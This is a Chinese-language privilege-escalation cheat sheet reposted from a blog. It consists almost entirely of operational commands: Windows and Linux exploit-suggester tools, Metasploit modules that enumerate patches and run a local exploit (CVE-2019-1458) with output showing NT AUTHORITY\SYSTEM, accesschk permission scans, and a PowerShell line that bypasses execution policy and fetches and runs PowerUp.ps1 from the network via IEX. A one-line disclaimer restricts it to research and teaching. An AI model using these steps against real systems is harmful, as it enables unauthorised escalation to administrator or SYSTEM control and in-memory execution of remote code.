使用Windows-Exploit-Suggester解析systeminfo
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
./windows-exploit-suggester.py
使用Linux-Exploit-Suggester.sh寻找linux提权问题
https://github.com/mzet-/linux-exploit-suggester
./linux-exploit-suggester.sh
使用Sherlock
https://github.com/rasta-mouse/Sherlock
Import-Module Sherlock.ps1
Find-AllVulns
使用msf查询补丁和可利用提权漏洞
查询补丁
run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010
# 查询Exp
use post/multi/recon/local_exploit_suggester
set LHOST <攻击机IP>
set SESSION <session_id>
run
# 利用示例
local/cve_2019_1458_wizardopium use exploit/windows/
set SESSION <session_id>
run
getuid
Server username: NT AUTHORITY\SYSTEM
使用powerup检查提权漏洞
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改
accesschk "d:\dir"
查看所有用户在d盘dir路径的子路径的权限
accesschk "Administrator "d:\dir"
查看Administrator用户在d盘dir路径的子路径的权限
accesschk Administrators -c *
查看Administrators组对所有服务的权限
accesschk -k Guest hklm\software
查看Guest用户对hklm\software注册表的权限
accesschk -ou User
查看User用户对全局对象的权限
转自Leticia's Blog
往期推荐
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论